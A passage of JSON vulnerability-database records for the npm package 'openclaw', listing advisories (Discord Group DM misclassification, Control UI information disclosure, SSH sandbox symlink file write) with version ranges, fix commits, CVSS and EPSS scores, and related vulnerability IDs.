3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["GHSA-f3h5-h452-vp3j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c25h-khws-2fc3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89835?format=json","vulnerability_id":"VCID-c4yt-z48z-zygv","summary":"OpenClaw: 
Discord Component Interaction Misclassifies Group DM as Direct Message\n## Summary\nDiscord Component Interaction Misclassifies Group DM as Direct Message\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real on shipped v2026.3.24 component-interaction routing/auth in extensions/discord/src/monitor/agent-components-helpers.ts, but impact is limited to Group DM policy or session misclassification.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8c83128fc38d5a3642b8ccbea58550755fdbbbaf` — 2026-03-30T11:17:53-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41341","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.051","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05106","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05121","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41341"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{
"reference_url":"https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8c83128fc38d5a3642b8ccbea58550755fdbbbaf"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6336-qqw9-v6x6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41341","reference_id":"",
"reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41341"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:34:01Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-component-interaction-misclassification-in-discord-extension"},{"reference_url":"https://github.com/advisories/GHSA-6336-qqw9-v6x6","reference_id":"GHSA-6336-qqw9-v6x6","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6336-qqw9-v6x6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xu
hx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3
c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41341","GHSA-6336-qqw9-v6x6"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c4yt-z48z-zygv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89511?format=json","vulnerability_id":"VCID-c76v-4577-n7c6","summary":"OpenClaw Has a Gateway Control Interface Information Disclosure Vulnerability\n## Summary\nOpenClaw Gateway Control Interface 
Information Disclosure Vulnerability\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Released Control UI bootstrap JSON did expose version and assistant agent id, but that is low-severity fingerprinting or info disclosure only; unreleased c5c10adc trims the payload.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c5c10adc022f42eb75ebb3bf364dd607738683b3` — 2026-03-30T15:08:19+01:00\n\nOpenClaw thanks @topsec-bunney for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41335","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12878","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12883","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41335"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scori
ng_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41335","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41335"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","s
coring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json"},{"reference_url":"https://github.com/advisories/GHSA-hr8g-2q7x-3f4w","reference_id":"GHSA-hr8g-2q7x-3f4w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hr8g-2q7x-3f4w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerab
ility":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerab
ility":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41335","GHSA-hr8g-2q7x-3f4w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c76v-4577-n7c6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89380?format=json","vulnerability_id":"VCID-carm-gpgh-wbbf","summary":"OpenClaw: SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n## Summary\nSSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28: SSH sandbox tar upload lacked pre-upload symlink escape rejection until 3d5af14984 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- 
`3d5af14984ac1976c747a8e11581d697bd0829dc` — 2026-03-31T19:56:45+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41364","reference_id":"","reference_type":"","scores":[{"value":"0.00191","scoring_system":"epss","scoring_elements":"0.40948","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00191","scoring_system":"epss","scoring_elements":"0.40921","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00191","scoring_system":"epss","scoring_elements":"0.40952","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41364"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N
/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41364","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41364"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring
